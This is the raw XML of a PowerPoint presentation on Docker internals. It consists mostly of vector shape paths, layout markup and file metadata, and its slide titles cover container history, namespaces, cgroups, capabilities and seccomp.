                  <a:cubicBezTo>
                    <a:pt x="265" y="27"/>
                    <a:pt x="264" y="25"/>
                    <a:pt x="258" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="22"/>
                    <a:pt x="243" y="23"/>
                    <a:pt x="235" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="28"/>
                    <a:pt x="203" y="35"/>
                    <a:pt x="187" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="46"/>
                    <a:pt x="173" y="50"/>
                    <a:pt x="166" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="65"/>
                    <a:pt x="196" y="75"/>
                    <a:pt x="212" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="92"/>
                    <a:pt x="200" y="97"/>
                    <a:pt x="195" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="101"/>
                    <a:pt x="193" y="100"/>
                    <a:pt x="191" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="89"/>
                    <a:pt x="162" y="79"/>
                    <a:pt x="148" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="67"/>
                    <a:pt x="144" y="67"/>
                    <a:pt x="142" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="77"/>
                    <a:pt x="119" y="84"/>
                    <a:pt x="108" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="99"/>
                    <a:pt x="93" y="105"/>
                    <a:pt x="85" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="124"/>
                    <a:pt x="117" y="136"/>
                    <a:pt x="133" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="151"/>
                    <a:pt x="121" y="155"/>
                    <a:pt x="116" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="160"/>
                    <a:pt x="111" y="160"/>
                    <a:pt x="109" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="148"/>
                    <a:pt x="83" y="138"/>
                    <a:pt x="69"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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="101" name="Freeform 1370"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10757225" y="1307074"/>
              <a:ext cx="198538" cy="153921"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 125"/>
                <a:gd name="T1" fmla="*/ 68 h 98"/>
                <a:gd name="T2" fmla="*/ 20 w 125"/>
                <a:gd name="T3" fmla="*/ 54 h 98"/>
                <a:gd name="T4" fmla="*/ 24 w 125"/>
                <a:gd name="T5" fmla="*/ 55 h 98"/>
                <a:gd name="T6" fmla="*/ 60 w 125"/>
                <a:gd name="T7" fmla="*/ 69 h 98"/>
                <a:gd name="T8" fmla="*/ 91 w 125"/>
                <a:gd name="T9" fmla="*/ 74 h 98"/>
                <a:gd name="T10" fmla="*/ 93 w 125"/>
                <a:gd name="T11" fmla="*/ 74 h 98"/>
                <a:gd name="T12" fmla="*/ 101 w 125"/>
                <a:gd name="T13" fmla="*/ 62 h 98"/>
                <a:gd name="T14" fmla="*/ 97 w 125"/>
                <a:gd name="T15" fmla="*/ 51 h 98"/>
                <a:gd name="T16" fmla="*/ 93 w 125"/>
                <a:gd name="T17" fmla="*/ 48 h 98"/>
                <a:gd name="T18" fmla="*/ 68 w 125"/>
                <a:gd name="T19" fmla="*/ 21 h 98"/>
                <a:gd name="T20" fmla="*/ 93 w 125"/>
                <a:gd name="T21" fmla="*/ 0 h 98"/>
                <a:gd name="T22" fmla="*/ 116 w 125"/>
                <a:gd name="T23" fmla="*/ 20 h 98"/>
                <a:gd name="T24" fmla="*/ 115 w 125"/>
                <a:gd name="T25" fmla="*/ 33 h 98"/>
                <a:gd name="T26" fmla="*/ 116 w 125"/>
                <a:gd name="T27" fmla="*/ 39 h 98"/>
                <a:gd name="T28" fmla="*/ 124 w 125"/>
                <a:gd name="T29" fmla="*/ 68 h 98"/>
                <a:gd name="T30" fmla="*/ 99 w 125"/>
                <a:gd name="T31" fmla="*/ 96 h 98"/>
                <a:gd name="T32" fmla="*/ 66 w 125"/>
                <a:gd name="T33" fmla="*/ 94 h 98"/>
                <a:gd name="T34" fmla="*/ 0 w 125"/>
                <a:gd name="T35" fmla="*/ 68 h 98"/>
                <a:gd name="T36" fmla="*/ 0 w 125"/>
                <a:gd name="T37" fmla="*/ 6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98">
                  <a:moveTo>
                    <a:pt x="0" y="68"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="63"/>
                    <a:pt x="13" y="59"/>
                    <a:pt x="20" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="54"/>
                    <a:pt x="23" y="55"/>
                    <a:pt x="24" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="60"/>
                    <a:pt x="48" y="65"/>
                    <a:pt x="60" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="73"/>
                    <a:pt x="80" y="75"/>
                    <a:pt x="91" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="74"/>
                    <a:pt x="92" y="74"/>
                    <a:pt x="93" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="74"/>
                    <a:pt x="103" y="70"/>
                    <a:pt x="101" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="58"/>
                    <a:pt x="98" y="55"/>
                    <a:pt x="97" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="49"/>
                    <a:pt x="95" y="48"/>
                    <a:pt x="93" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="48"/>
                    <a:pt x="67" y="36"/>
                    <a:pt x="68" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="9"/>
                    <a:pt x="81" y="0"/>
                    <a:pt x="93" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="0"/>
                    <a:pt x="115" y="9"/>
                    <a:pt x="116" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="24"/>
                    <a:pt x="116" y="29"/>
                    <a:pt x="115" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="35"/>
                    <a:pt x="115" y="37"/>
                    <a:pt x="116" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="48"/>
                    <a:pt x="125" y="57"/>
                    <a:pt x="124" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="83"/>
                    <a:pt x="114" y="93"/>
                    <a:pt x="99" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="98"/>
                    <a:pt x="77" y="96"/>
                    <a:pt x="66" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="89"/>
                    <a:pt x="21" y="79"/>
                    <a:pt x="0" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0"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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="102" name="Freeform 1371"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10661304" y="1039384"/>
              <a:ext cx="136077" cy="91460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 85 w 85"/>
                <a:gd name="T1" fmla="*/ 45 h 57"/>
                <a:gd name="T2" fmla="*/ 65 w 85"/>
                <a:gd name="T3" fmla="*/ 55 h 57"/>
                <a:gd name="T4" fmla="*/ 60 w 85"/>
                <a:gd name="T5" fmla="*/ 45 h 57"/>
                <a:gd name="T6" fmla="*/ 49 w 85"/>
                <a:gd name="T7" fmla="*/ 30 h 57"/>
                <a:gd name="T8" fmla="*/ 36 w 85"/>
                <a:gd name="T9" fmla="*/ 30 h 57"/>
                <a:gd name="T10" fmla="*/ 23 w 85"/>
                <a:gd name="T11" fmla="*/ 51 h 57"/>
                <a:gd name="T12" fmla="*/ 21 w 85"/>
                <a:gd name="T13" fmla="*/ 57 h 57"/>
                <a:gd name="T14" fmla="*/ 0 w 85"/>
                <a:gd name="T15" fmla="*/ 48 h 57"/>
                <a:gd name="T16" fmla="*/ 5 w 85"/>
                <a:gd name="T17" fmla="*/ 37 h 57"/>
                <a:gd name="T18" fmla="*/ 19 w 85"/>
                <a:gd name="T19" fmla="*/ 16 h 57"/>
                <a:gd name="T20" fmla="*/ 67 w 85"/>
                <a:gd name="T21" fmla="*/ 16 h 57"/>
                <a:gd name="T22" fmla="*/ 76 w 85"/>
                <a:gd name="T23" fmla="*/ 28 h 57"/>
                <a:gd name="T24" fmla="*/ 85 w 85"/>
                <a:gd name="T25"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7">
                  <a:moveTo>
                    <a:pt x="85" y="45"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="49"/>
                    <a:pt x="72" y="52"/>
                    <a:pt x="65" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="52"/>
                    <a:pt x="62" y="48"/>
                    <a:pt x="60" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="40"/>
                    <a:pt x="54" y="34"/>
                    <a:pt x="49" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="25"/>
                    <a:pt x="41" y="25"/>
                    <a:pt x="36" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="36"/>
                    <a:pt x="26" y="43"/>
                    <a:pt x="23" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="53"/>
                    <a:pt x="21" y="55"/>
                    <a:pt x="21" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="54"/>
                    <a:pt x="7" y="51"/>
                    <a:pt x="0" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="44"/>
                    <a:pt x="3" y="40"/>
                    <a:pt x="5" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="30"/>
                    <a:pt x="13" y="22"/>
                    <a:pt x="19" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="0"/>
                    <a:pt x="53" y="0"/>
                    <a:pt x="67" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="20"/>
                    <a:pt x="74" y="24"/>
                    <a:pt x="76" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="34"/>
                    <a:pt x="82" y="39"/>
                    <a:pt x="8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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="103" name="Freeform 1372"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10663534" y="1445381"/>
              <a:ext cx="133845" cy="89230"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 84"/>
                <a:gd name="T1" fmla="*/ 12 h 57"/>
                <a:gd name="T2" fmla="*/ 20 w 84"/>
                <a:gd name="T3" fmla="*/ 2 h 57"/>
                <a:gd name="T4" fmla="*/ 29 w 84"/>
                <a:gd name="T5" fmla="*/ 19 h 57"/>
                <a:gd name="T6" fmla="*/ 36 w 84"/>
                <a:gd name="T7" fmla="*/ 28 h 57"/>
                <a:gd name="T8" fmla="*/ 48 w 84"/>
                <a:gd name="T9" fmla="*/ 28 h 57"/>
                <a:gd name="T10" fmla="*/ 62 w 84"/>
                <a:gd name="T11" fmla="*/ 7 h 57"/>
                <a:gd name="T12" fmla="*/ 64 w 84"/>
                <a:gd name="T13" fmla="*/ 0 h 57"/>
                <a:gd name="T14" fmla="*/ 84 w 84"/>
                <a:gd name="T15" fmla="*/ 10 h 57"/>
                <a:gd name="T16" fmla="*/ 65 w 84"/>
                <a:gd name="T17" fmla="*/ 43 h 57"/>
                <a:gd name="T18" fmla="*/ 19 w 84"/>
                <a:gd name="T19" fmla="*/ 43 h 57"/>
                <a:gd name="T20" fmla="*/ 0 w 84"/>
                <a:gd name="T21"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0" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="8"/>
                    <a:pt x="13" y="5"/>
                    <a:pt x="20" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="8"/>
                    <a:pt x="25" y="14"/>
                    <a:pt x="29" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="22"/>
                    <a:pt x="33" y="25"/>
                    <a:pt x="36" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="32"/>
                    <a:pt x="44" y="32"/>
                    <a:pt x="48" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="22"/>
                    <a:pt x="58" y="15"/>
                    <a:pt x="62" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="5"/>
                    <a:pt x="63" y="3"/>
                    <a:pt x="64" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="4"/>
                    <a:pt x="78" y="6"/>
                    <a:pt x="84" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="22"/>
                    <a:pt x="74" y="33"/>
                    <a:pt x="65" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="57"/>
                    <a:pt x="33" y="57"/>
                    <a:pt x="19" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="34"/>
                    <a:pt x="5" y="23"/>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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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417782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brief History of Containers</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301064211"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1141413" y="1779225"/>
          <a:ext cx="9906000" cy="46738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6094412" y="6453051"/>
            <a:ext cx="5251269" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Source: https://blog.aquasec.com/a-brief-history-of-containers-from-1970s-chroot-to-docker-2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6453051"/>
            <a:ext cx="2245360" cy="26842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flipV="1">
            <a:off x="181610" y="6299199"/>
            <a:ext cx="1122680" cy="15385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146308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brief History of Containers [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>contD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1141413" y="1779225"/>
          <a:ext cx="9906000" cy="46738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6094412" y="6453051"/>
            <a:ext cx="5251269" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Source: https://blog.aquasec.com/a-brief-history-of-containers-from-1970s-chroot-to-docker-2016</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6453051"/>
            <a:ext cx="2245360" cy="26842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flipV="1">
            <a:off x="181610" y="6299199"/>
            <a:ext cx="1122680" cy="15385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764385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Containers v/s Virtual Machines </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05336" y="1809704"/>
            <a:ext cx="7390878" cy="3914363"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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349537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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/ Virtual Machines </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t>Source: https://runnable.com/docker/why-use-docker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3967921" y="1600201"/>
            <a:ext cx="4465707" cy="2408129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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6578820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LFACtHJeQT2LETwdr5djk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LFACtHJeQT2LETwdr5djk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ceYqhEk8RNS6Za02hVWxc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ceYqhEk8RNS6Za02hVWxc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ceYqhEk8RNS6Za02hVWxc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fe3rHPKOTt62J9gUCCBGQ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s3nKGUIUSv6mUgn1rNWAM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bhE.PNzZSv26j_MdLJIdm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R1eESPiVTH.DgIlez5h9I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4wxFUwVkSgmhRhpJRl1Ty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R1eESPiVTH.DgIlez5h9I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zj7RSVXOSPOTkUAvGqBa1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zj7RSVXOSPOTkUAvGqBa1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zj7RSVXOSPOTkUAvGqBa1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zj7RSVXOSPOTkUAvGqBa1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zj7RSVXOSPOTkUAvGqBa1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zj7RSVXOSPOTkUAvGqBa1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R1eESPiVTH.DgIlez5h9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tLgyQz39T1SRBBGVl45yK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Pp5WdVdxSc.f4ONBeikOa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UkGMH8TETuuzKt6r8ngUWQ"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="CyberWeek">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="44546A"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="B22024"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="2D3031"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="3E4142"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="696C6F"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="710F11"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="BBBDBF"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0563C1"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="954F72"/>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15498</TotalTime>
  <Words>4231</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>542</Paragraphs>
  <Slides>51</Slides>
  <Notes>34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9" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>think-cell Slide</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What Every Developer Says</vt:lpstr>
      <vt:lpstr>What is Docker</vt:lpstr>
      <vt:lpstr>A brief History of Containers</vt:lpstr>
      <vt:lpstr>A brief History of Containers [contD.]</vt:lpstr>
      <vt:lpstr>Containers v/s Virtual Machines </vt:lpstr>
      <vt:lpstr>Container v/ Virtual Machines </vt:lpstr>
      <vt:lpstr>Basics of Docker</vt:lpstr>
      <vt:lpstr>Docker Architecture</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Docker Internals</vt:lpstr>
      <vt:lpstr>Docker Internals</vt:lpstr>
      <vt:lpstr>Namespaces</vt:lpstr>
      <vt:lpstr>Namespaces - Network</vt:lpstr>
      <vt:lpstr>Namespaces - Network</vt:lpstr>
      <vt:lpstr>Namespaces - PID</vt:lpstr>
      <vt:lpstr>Namespaces - PID</vt:lpstr>
      <vt:lpstr>Storage - OverlayFS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cgroups</vt:lpstr>
      <vt:lpstr>Cgroups</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Security: Capabilities</vt:lpstr>
      <vt:lpstr>Security: Capabilities</vt:lpstr>
      <vt:lpstr>Security: Capabilities</vt:lpstr>
      <vt:lpstr>Security: Capabilities</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Security: Seccomp</vt:lpstr>
      <vt:lpstr>Security: Seccomp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Firosh Shaji</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Suraj Khetani</cp:lastModifiedBy>
  <cp:revision>146</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-12T07:43:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-15T10:07:58Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>